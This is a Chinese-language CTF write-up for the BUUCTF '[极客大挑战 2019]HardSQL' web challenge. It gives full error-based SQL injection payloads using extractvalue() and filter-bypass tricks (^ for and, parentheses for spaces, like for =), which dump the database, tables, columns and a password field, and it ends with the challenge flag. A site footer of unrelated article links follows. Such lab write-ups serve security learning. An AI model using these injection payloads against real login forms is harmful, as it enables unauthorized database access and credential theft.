BUUCTF---web---[极客大挑战 2019]HardSQL

简介: BUUCTF---web---[极客大挑战 2019]HardSQL

1、题目描述

2、使用万能密码发现不可以,这种题前面有很多,这道题用前面的绕过方法不行,得换一种前面没有用过的方法,最近刚学了报错注入,前面就没有用这个方法,这里试试

3、使用extractvalue()函数构造下面方法,发现不可以,可能是有些字符被过滤了。这里将


/check.php?username=admin&password=1' and extractvalue(1,concat(0x7e,(select database()),0x7e)))#


查阅资料后发现需要构造下面的方法 and用^替换,#用%23替换,空格用()替换


/check.php?username=admin&password=1%27^extractvalue(1,concat(0x7e,(select(database()))))%23

使用上面语句可以查出数据库名

4、用类似的方法查表名:这里注意=用like替换


/check.php?username=admin&password=1%27^extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='geek')%23


/check.php?username=admin&password=1%27^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23

5、查表中字段名:


/check.php?username=admin&password=1%27^extractvalue(1,concat(0x7e,(select group_concat(table_column) from information_schema.columns where table_name='H4rDsq1')%23


/check.php?username=admin&password=1%27^extractvalue(1,concat(0x7e,(select(group_concat(table_column))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23

6、查出对应库对应表对应字段password中的值


/check.php?username=admin&password=1%27^extractvalue(1,concat(0x7e,(select password from geek.H4rDsq1))%23


/check.php?username=admin&password=1%27^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23

7、  太可恶了,只爆出了一半,问题不大,我们使用right()函数,爆出password的 ,一般flag的长度为32位,加上前面爆出了大概有二十来个,继续爆右边大概15个就可以凑完整,不放心的话,可以爆长点


/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(right(password,15))from(geek.H4rDsq1))))%23  

8、

flag{b0583d02-20d4-4e6d-8e4c-55937ed420d8}

相关文章
|
安全 网络安全 PHP
BUUCTF Web [极客大挑战 2019]Secret File
[极客大挑战 2019]Secret File 一、题目简介 二、思路分析 1)信息泄露
1657 0
BUUCTF Web [极客大挑战 2019]Secret File
|
安全 网络安全 PHP
BUUCTF Web [极客大挑战 2019]Knife
BUUCTF Web [极客大挑战 2019]Knife [极客大挑战 2019]Knife 一、题目简介 二、思路分析
904 0
BUUCTF Web [极客大挑战 2019]Knife
|
SQL 安全 网络安全
BUUCTF Web [极客大挑战 2019]LoveSQL
一、题目简介 进入题目连接是一个「登录」界面
534 0
BUUCTF Web [极客大挑战 2019]LoveSQL
|
安全 网络安全
BUUCTF Web [极客大挑战 2019]Havefun
大挑战 2019]Havefun 一、题目简介
973 0
BUUCTF Web [极客大挑战 2019]Havefun
|
SQL 安全 网络安全
BUUCTF Web [极客大挑战 2019]EasySQL
[HCTF 2018]WarmUp 一、题目简介
342 0
|
3月前
|
算法 Java Go
【GoGin】(1)上手Go Gin 基于Go语言开发的Web框架,本文介绍了各种路由的配置信息;包含各场景下请求参数的基本传入接收
gin 框架中采用的路优酷是基于httprouter做的是一个高性能的 HTTP 请求路由器,适用于 Go 语言。它的设计目标是提供高效的路由匹配和低内存占用,特别适合需要高性能和简单路由的应用场景。
304 4
|
7月前
|
缓存 JavaScript 前端开发
鸿蒙5开发宝藏案例分享---Web开发优化案例分享
本文深入解读鸿蒙官方文档中的 `ArkWeb` 性能优化技巧,从预启动进程到预渲染,涵盖预下载、预连接、预取POST等八大优化策略。通过代码示例详解如何提升Web页面加载速度,助你打造流畅的HarmonyOS应用体验。内容实用,按需选用,让H5页面快到飞起!
|
7月前
|
JavaScript 前端开发 API
鸿蒙5开发宝藏案例分享---Web加载时延优化解析
本文深入解析了鸿蒙开发中Web加载完成时延的优化技巧,结合官方案例与实际代码,助你提升性能。核心内容包括:使用DevEco Profiler和DevTools定位瓶颈、四大优化方向(资源合并、接口预取、图片懒加载、任务拆解)及高频手段总结。同时提供性能优化黄金准则,如首屏资源控制在300KB内、关键接口响应≤200ms等,帮助开发者实现丝般流畅体验。
|
前端开发 JavaScript Shell
鸿蒙5开发宝藏案例分享---Web页面内点击响应时延分析
本文为鸿蒙开发者整理了Web性能优化的实战案例解析,结合官方文档深度扩展。内容涵盖点击响应时延核心指标(≤100ms)、性能分析工具链(如DevTools时间线、ArkUI Trace抓取)以及高频优化场景,包括递归函数优化、网络请求阻塞解决方案和setTimeout滥用问题等。同时提供进阶技巧,如首帧加速、透明动画陷阱规避及Web组件初始化加速,并通过优化前后Trace对比展示成果。最后总结了快速定位问题的方法与开发建议,助力开发者提升Web应用性能。
|
7月前
|
JSON 开发框架 自然语言处理
【HarmonyOS Next之旅】基于ArkTS开发(三) -> 兼容JS的类Web开发(三)
本文主要介绍了应用开发中的三大核心内容:生命周期管理、资源限定与访问以及多语言支持。在生命周期部分,详细说明了应用和页面的生命周期函数及其触发时机,帮助开发者更好地掌控应用状态变化。资源限定与访问章节,则聚焦于资源限定词的定义、命名规则及匹配逻辑,并阐述了如何通过 `$r` 引用 JS 模块内的资源。最后,多语言支持部分讲解了如何通过 JSON 文件定义多语言资源,使用 `$t` 和 `$tc` 方法实现简单格式化与单复数格式化,为全球化应用提供便利。
283 104